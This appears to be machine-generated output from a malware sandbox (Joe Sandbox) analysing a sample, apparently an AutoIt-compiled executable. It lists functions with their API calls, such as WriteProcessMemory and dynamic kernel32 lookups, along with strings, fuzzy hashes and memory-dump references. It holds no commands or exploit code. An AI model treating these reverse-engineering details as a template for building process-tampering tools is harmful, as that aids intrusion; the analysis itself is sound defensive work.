Instruction Fuzzy Hash: B1A13C71204205AFD700EF54C891EABB7E8EF98304F00491DF59A9B1E2DB70EA49CB72

Function 00D12E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00D20FF6: std::exception::exception.LIBCMT ref: 00D2102C
Part of subcall function 00D20FF6: __CxxThrowException@8.LIBCMT ref: 00D21041

Part of subcall function 00D07F41: _memmove.LIBCMT ref: 00D07F82

Part of subcall function 00D07BB1: _memmove.LIBCMT ref: 00D07C0B

__swprintf.LIBCMT ref: 00D1302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D12EC6

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 09dc1a210ece07e570ae4813051530b0659111227e92a5bae2f54fd70c7d5fcd
Instruction ID: b8bde32d7e0581f7228ed870d347faf62e86a10f2ba0bd7942077ecf5466a19f
Opcode Fuzzy Hash: 09dc1a210ece07e570ae4813051530b0659111227e92a5bae2f54fd70c7d5fcd
Instruction Fuzzy Hash: 43916F71508301AFC718EF24E995D6EB7E4EF99740F04491DF4969B2A1DE20EE48CB72

Function 00D6BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D048A1,?,?,00D037C0,?), ref: 00D048CE

CoInitialize.OLE32(00000000), ref: 00D6BC26
CoCreateInstance.OLE32(00D92D6C,00000000,00000001,00D92BDC,?), ref: 00D6BC3F
CoUninitialize.OLE32 ref: 00D6BC5C

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

Strings

.lnk, xrefs: 00D6BC08, 00D6BC16

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 95be38846b29f1c096f8589284315a44ad00547018f441f736ae48eab674b9b9
Instruction ID: 25b40b10a88da9ce34fb44d26efe03a9a9f40e89a7fa0f0335964f3619e53db0
Opcode Fuzzy Hash: 95be38846b29f1c096f8589284315a44ad00547018f441f736ae48eab674b9b9
Instruction Fuzzy Hash: 11A106756043019FCB10DF24C494E6ABBE5FF89324F148959F89A9B3A2CB31ED45CBA1

Function 00D2524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00D252DD

Part of subcall function 00D30340: __87except.LIBCMT ref: 00D3037B

Strings

pow, xrefs: 00D252B5, 00D252D2

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 2255ebb1e4c889da5057b4cf87b04e1a2ad69de287d134039585f9119c455c36
Instruction ID: c292037565648f3d619e1df51a0efe9df4111976b282808f9b46a20a1e9d5c37
Opcode Fuzzy Hash: 2255ebb1e4c889da5057b4cf87b04e1a2ad69de287d134039585f9119c455c36
Instruction Fuzzy Hash: 22516631A1D701D6CB10B724F921B6E2F94DF20354F288969E0D5822EEEE74CDD49AB6

Function 00D2023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00D20280
+, xrefs: 00D20277

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 1fa3dbcabb0c050d4d77f5a8db5d893c8ad99de289e8a7a18a44cf9d7cc19d19
Instruction ID: 4ec473ad92e2bf1f7ed822cb10a6c98e037ebd0db7bd973fcdc0cd910218bd74
Opcode Fuzzy Hash: 1fa3dbcabb0c050d4d77f5a8db5d893c8ad99de289e8a7a18a44cf9d7cc19d19
Instruction Fuzzy Hash: 3C514136504256CFCF16DF28E4986FA7BB4EF2A310F180056EC919B2A5D7749C4ACB70

Function 00D162F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D163A8
_memmove.LIBCMT ref: 00D16446
_memset.LIBCMT ref: 00D1646A

Strings

ERCP, xrefs: 00D16313

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: f9ab5e8c24bb98cc82c4b562d1815cc3a6ba9e9547e5f94374530f9cbad2b8ce
Instruction ID: 0e13b166d19a31346d7ba5c50b8d39f6ee9be6691309623981ebcaada77e2c36
Opcode Fuzzy Hash: f9ab5e8c24bb98cc82c4b562d1815cc3a6ba9e9547e5f94374530f9cbad2b8ce
Instruction Fuzzy Hash: BB51D171904719EBCB24CF65D881BEABBF4EF04314F24856EE99ACB241EB71D584CB60

Function 00D59CD7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D619CC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D59778,?,?,00000034,00000800,?,00000034), ref: 00D619F6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00D59D21

Part of subcall function 00D61997: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00D597A7,?,?,00000800,?,00001073,00000000,?,?), ref: 00D619C1

Part of subcall function 00D618EE: GetWindowThreadProcessId.USER32(?,?), ref: 00D61919
Part of subcall function 00D618EE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00D5973C,00000034,?,?,00001004,00000000,00000000), ref: 00D61929
Part of subcall function 00D618EE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00D5973C,00000034,?,?,00001004,00000000,00000000), ref: 00D6193F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D59D8E
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00D59DDB

Strings

@, xrefs: 00D59DF3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 1d9224a6483f5615d164d984cb49754a0a37a1a91c85069839f4cf45d273c449
Instruction ID: 298a6fe4e5ee7eda58ea454a559bc0a6d9e47a72faa637c3bb42ae7ab399f3b8
Opcode Fuzzy Hash: 1d9224a6483f5615d164d984cb49754a0a37a1a91c85069839f4cf45d273c449
Instruction Fuzzy Hash: 86413D76901218BFDF10DBA4CC52AEEBBB8EB09300F144095FA55B7191DA706E89CFB0

Function 00D87BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00D8F910,00000000,?,?,?,?), ref: 00D87C4E
GetWindowLongW.USER32 ref: 00D87C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00D87C7B

Strings

SysTreeView32, xrefs: 00D87C20

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: efc4e122d38c2764b453c35817ba4b9b565bacf86843dd491588c1cee9a96bf0
Instruction ID: de6a0f82a8ae600296bbb40f067ef4c5193fdcb025d75510edca94a89229ae60
Opcode Fuzzy Hash: efc4e122d38c2764b453c35817ba4b9b565bacf86843dd491588c1cee9a96bf0
Instruction Fuzzy Hash: AE318D31204206AEDB11AF38DC45BEA77A9EB59324F244725F879D32E0D731E8559B70

Function 00D87648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00D876D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00D876E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00D87708

Strings

SysMonthCal32, xrefs: 00D8769B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: da0664f35380d2f5b7214b85f8105f0b9b53e1e91034ae407154b0d2b1117e8b
Instruction ID: 44946747a36dba26ab23ff4c039a2dadd78fa403938941877a6fb78d7c41d871
Opcode Fuzzy Hash: da0664f35380d2f5b7214b85f8105f0b9b53e1e91034ae407154b0d2b1117e8b
Instruction Fuzzy Hash: A1219F32510219BBDF11DFA4CC46FEA3B69EF48724F250214FE15AB1D0DAB1E8549BB0

Function 00D86F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00D86FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00D86FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00D86FDF

Strings

Listbox, xrefs: 00D86F77

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 960587cad24abe0192cd6e32189fb8227ffcb425377b5c6b9a94f71166d60724
Instruction ID: e485b362b0dd15ac888d96b274ba765b204f464cd10f001e662bd7e15a1888f7
Opcode Fuzzy Hash: 960587cad24abe0192cd6e32189fb8227ffcb425377b5c6b9a94f71166d60724
Instruction Fuzzy Hash: 48216232610218BFDF119F54DC85FAB37AAEF89764F158124FA159B190CA71EC51CBB0

Function 00D8797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00D879E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00D879F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00D87A03

Strings

msctls_trackbar32, xrefs: 00D879B8

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 686f0291ad3a0a1bbf0d371a620b8aa4981551bc45ac704ff5b1fc02f281005b
Instruction ID: b890d890c67266e70208bf3d3fcdb2b7cde8fb81d528ee0a83ad1f6a49f87a2d
Opcode Fuzzy Hash: 686f0291ad3a0a1bbf0d371a620b8aa4981551bc45ac704ff5b1fc02f281005b
Instruction Fuzzy Hash: A811E332254208BEEF14AF61CC45FEB3BADEF89764F150519FA45A60D0D672D811CB70

Function 00D04C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D04C2E), ref: 00D04CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D04CB5

Strings

GetNativeSystemInfo, xrefs: 00D04CAF
kernel32.dll, xrefs: 00D04C9E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 874ea39d5e8edad3c67417c3e389c531fd475e0f632f90c404106c244770d7d2
Instruction ID: 99fbf070ef7909ad1eb6db4d77439415a665e648b09ece6f48a11b7385cf2f28
Opcode Fuzzy Hash: 874ea39d5e8edad3c67417c3e389c531fd475e0f632f90c404106c244770d7d2
Instruction Fuzzy Hash: 6BD01271510723CFD7205F31D918B4676D5AF05751F1588399885D6290DA70D490C770

Function 00D04D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D04CE1,?), ref: 00D04DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D04DB4

Strings

kernel32.dll, xrefs: 00D04D9D
Wow64RevertWow64FsRedirection, xrefs: 00D04DAE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 30386850a704bc82b7991ef1b13ab44570ce0f28b72b5729b89b740cc2adee67
Instruction ID: bc27bbec5b7e35491efa1e4f64dde6ae4f9f1327ad059bbc9dbd23f3a2f7adb3
Opcode Fuzzy Hash: 30386850a704bc82b7991ef1b13ab44570ce0f28b72b5729b89b740cc2adee67
Instruction Fuzzy Hash: ADD01771660713CFD720AF31D808B8676E5AF05765B15883AD8CAD6290EB70D880CBB0

Function 00D04D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00D04D2E,?,00D04F4F,?,00DC62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D04D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D04D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00D04D7B
kernel32.dll, xrefs: 00D04D6A

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 0087effe8cfa59ed0819e3b43858e6d2ec5dbe6dfe4d38781b521c914bd47054
Instruction ID: 55b860a25533f2d6070fd95d5783ad134cd611d0f5c97fbf280ef275f4d68e2d
Opcode Fuzzy Hash: 0087effe8cfa59ed0819e3b43858e6d2ec5dbe6dfe4d38781b521c914bd47054
Instruction Fuzzy Hash: A4D01771620713CFD720AF31D808B5676E8AF15762B19883ED48AD6290E670D880CB70

Function 00D81072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00D812C1), ref: 00D81080
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D81092

Strings

advapi32.dll, xrefs: 00D8107B
RegDeleteKeyExW, xrefs: 00D8108C

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 494588dc5f029cc50238dd995f33eab4aff5509410f89b346528a7d26a639f43
Instruction ID: 62754aa8fd3f80253ad17d5b27d22df39219fd0b7b196908e7405f1680e903ed
Opcode Fuzzy Hash: 494588dc5f029cc50238dd995f33eab4aff5509410f89b346528a7d26a639f43
Instruction Fuzzy Hash: 24D01735520712CFD720AF35DC18A6A76E8AF05761B158C3AA48ADA250E7B0C8C4CB70

Function 00D793F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00D79009,?,00D8F910), ref: 00D79403
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00D79415

Strings

GetModuleHandleExW, xrefs: 00D7940F
kernel32.dll, xrefs: 00D793FE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 603b72f93f483c27ee32a4764173013e7a745db72b49e5e228bed86cda76b8ac
Instruction ID: 06d82962d1dcc1f8263d776370c6b8f76b6c9727edae09dea2bd72fac21eb3e5
Opcode Fuzzy Hash: 603b72f93f483c27ee32a4764173013e7a745db72b49e5e228bed86cda76b8ac
Instruction Fuzzy Hash: 09D0C736660313CFC7209F30C90C202B6E4AF00351B04C83AA48AC2650E670C880CB34

Function 00D41B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00D41B42
__swprintf.LIBCMT ref: 00D41B73

Strings

%.3d, xrefs: 00D41B4D
WIN_XPe, xrefs: 00D41BB2

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: c0b95ac3c116396233958ebb0e37f5d82d3e3fc4ecd3bcd5383e85e6fe72e311
Instruction ID: 34ee1e89f963fba8a488486a522320cf58b95dc86d8f80c88031759fa1a034ae
Opcode Fuzzy Hash: c0b95ac3c116396233958ebb0e37f5d82d3e3fc4ecd3bcd5383e85e6fe72e311
Instruction Fuzzy Hash: 79D01279814118EBCB449B90DC449FA737CE709301F140692B546D5440F275DBC4DB35

Function 00D576C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d31bf68523dd4e017f853ef62d8d454e49653ccd2774d607249e87ea83965bc1
Instruction ID: ae1c1a15ac77cbe240ee11742d8813f409a47ea63a9145ccbe54777faf961c30
Opcode Fuzzy Hash: d31bf68523dd4e017f853ef62d8d454e49653ccd2774d607249e87ea83965bc1
Instruction Fuzzy Hash: 0CC15C74A04216EFCB14CF98D884AAEBBB5FF48711B258598EC05EB251D730DE85CBA0

